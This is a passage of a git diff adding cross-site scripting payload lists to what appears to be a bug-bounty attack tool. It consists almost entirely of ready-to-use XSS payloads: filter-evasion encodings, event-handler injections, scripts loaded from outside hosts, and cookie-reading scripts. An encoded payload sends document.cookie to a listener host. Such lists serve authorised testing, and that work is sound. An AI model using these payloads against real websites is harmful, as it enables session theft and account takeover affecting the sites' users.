onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<Img src = x onerror = "javascript: window.onerror = alert; throw XSS"> +<Video> <source onerror = "javascript: alert (XSS)"> +<Input value = "XSS" type = text> +<applet code="javascript:confirm(document.cookie);"> +<isindex x="javascript:" onmouseover="alert(XSS)"> +"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +"><img src="x:x" onerror="alert(XSS)"> +"><iframe src="javascript:alert(XSS)"> +<object data="javascript:alert(XSS)"> +<isindex type=image src=1 onerror=alert(XSS)> +<img src=x:alert(alt) onerror=eval(src) alt=0> +<img src="x:gif" onerror="window['al\u0065rt'](0)"></img> +<iframe/src="data:text/html,<svg onload=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert(1)">X +</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'> +<style>//*{x:expression(alert(/xss/))}//<style></style> +On Mouse Over​ +<img src="/" =_=" title="onerror='prompt(1)'"> +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<form><button formaction=javascript&colon;alert(1)>CLICKME +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4= +<javascript:alert(document.cookie>) +xss=500); alert(document.cookie);// +<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))"> +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +<A HREF="http://1113982867/">XSS</A> +<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +<A HREF="http://66.102.7.147/">XSS</A> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="httx://xss.rocks/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="httx://xss.rocks/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="httx://xss.rocks/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="httx://xss.rocks/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="httx://xss.rocks/xss.js"></SCRIPT> +<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT> ++ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT> +<BASE HREF="javascript:alert('XSS');//"> +<DIV STYLE="width: expression(alert('XSS'));"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K +¼script¾alert(¢XSS¢)¼/script¾ +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*"); +xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<BR SIZE="&{alert('XSS')}"> +<BGSOUND SRC="javascript:alert('XSS');"> +Set.constructor`alert\x28document.domain\x29``` +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG LOWSRC="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<BODY BACKGROUND="javascript:alert('XSS')"> +\";alert('XSS');// +<iframe src=http://xss.rocks/scriptlet.html < +<IMG SRC="`<javascript:alert>`('XSS')" +<SCRIPT SRC=//xss.rocks/.j> +<SCRIPT SRC=http://xss.rocks/xss.js?< B > +<<SCRIPT>alert("XSS");//\<</SCRIPT> +<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041"> +<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> +<IMG onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\> +\<a onmouseover=alert(document.cookie)\>xxs link\</a\> +\<a onmouseover="alert(document.cookie)"\>xxs link\</a\> +<IMG SRC=`javascript:alert("Soufiane says, 'XSS'")`> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC="javascript:alert('XSS');"> +javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> +<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT> +%C0%BCscript%C0%A0src%C0%BD%C0%82mymethod%C0%A8%C0%A9%C0%82%C0%A0%C0%AF%C0%BE diff --git a/bounty_drive/attacks/xss/payloads/XSS-Jhaddix.txt b/bounty_drive/attacks/xss/payloads/XSS-Jhaddix.txt new file mode 100644 index 0000000..7c0e3e3 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-Jhaddix.txt @@ -0,0 +1,110 @@ +'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E +<<scr\0ipt/src=http://xss.com/xss.js></script +%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E +' onmouseover=alert(/XSS/) +"><iframe%20src="http://google.com"%%203E +'<script>window.onload=function(){document.forms[0].message.value='1';}</script> +x”</title><img src%3dx onerror%3dalert(1)> +<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> +<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> +<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> +<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> +<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> +<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> +<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> +<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> +<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> +<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> +<script>alert(document.head.innerHTML.substr(146,20));</script> +<script>alert(document.head.childNodes[3].text)</script> +<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> +<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> +<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> +<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> +<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> +<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> +<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> +<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> +<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> +<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # +<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # +<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># +<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 +<script for=document event=onreadystatechange>getElementById('safe123').click()</script> +<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> +<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> +<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new 